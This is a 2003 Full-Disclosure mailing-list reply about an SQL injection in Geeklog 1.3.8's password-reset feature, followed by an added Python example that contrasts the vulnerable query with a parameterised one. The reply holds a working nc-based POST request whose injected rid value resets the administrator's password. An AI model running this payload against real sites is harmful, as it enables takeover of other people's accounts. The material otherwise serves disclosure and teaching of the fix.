Re: [Full-Disclosure] Geeklog exploit
- To: <full-disclosure@lists.netsys.com>
- Subject: Re: [Full-Disclosure] Geeklog exploit
- From: Thomas Rogg <thomas@outcast-media.com>
- Date: Sun, 19 Oct 2003 20:15:15 +0200
On 19.10.2003 at 18:21, Jouko Pynnonen wrote at jouko@iki.fi:
> ...
> The exploit uses the "forgot password" feature introduced in Geeklog
> 1.3.8. By constructing a certain kind of HTTP request, an attacker can
> change any user's Geeklog password, including the administrator
> password. This is because an SQL injection problem. In users.php we have
> this kind of code (line about 750):
> ...
I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."
Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:
-----
#!/bin/sh
# usage: ./geeklog.sh <host> <path>
# $1 is the host, $2 is the path prefix of the Geeklog install (ending in "/")
# The blank line after the headers separates them from the POST body;
# Content-length: 50 covers the body plus its trailing newline.
echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----
Thank you,
Thomas
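The thread names the root cause (the `rid` request parameter reaching the SQL query unescaped) but the users.php code itself is elided. The following is an added example, not Geeklog's code or anything from this thread: a hypothetical reconstruction of the vulnerable lookup pattern next to its parameterised replacement, run against a constructed in-memory table, so the difference in which rows the password-reset step would touch is visible.

```python
import sqlite3

def make_db():
    """Constructed stand-in for a users table: uid, name and the
    pending password-reset request id (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER, username TEXT, pwrequestid TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "Admin", "a1b2c3"),   # administrator: no reset request an outsider knows
        (2, "someuser", "3"),     # ordinary user with reset request id 3
    ])
    return db

def lookup_vulnerable(db, uid, rid):
    """Hypothetical reconstruction of the unsafe pattern: request values are
    pasted straight into the WHERE clause, so a quote in rid rewrites it."""
    sql = (f"SELECT uid FROM users WHERE uid = '{uid}' "
           f"AND pwrequestid = '{rid}' ORDER BY uid")
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, uid, rid):
    """Parameterised form: rid is compared as data, never parsed as SQL."""
    sql = "SELECT uid FROM users WHERE uid = ? AND pwrequestid = ? ORDER BY uid"
    return [row[0] for row in db.execute(sql, (uid, rid))]

if __name__ == "__main__":
    db = make_db()
    # The rid value from the thread's request, URL-decoded: 3' or uid='1
    tampered = "3' or uid='1"
    print("vulnerable, legit rid :", lookup_vulnerable(db, "2", "3"))
    print("vulnerable, tampered  :", lookup_vulnerable(db, "2", tampered))
    print("hardened, tampered    :", lookup_hardened(db, "2", tampered))
```

With the concatenated query the tampered request matches both the requesting user and uid 1, which is exactly the set of accounts a following "set new password" step would overwrite; the parameterised query matches nothing.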
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html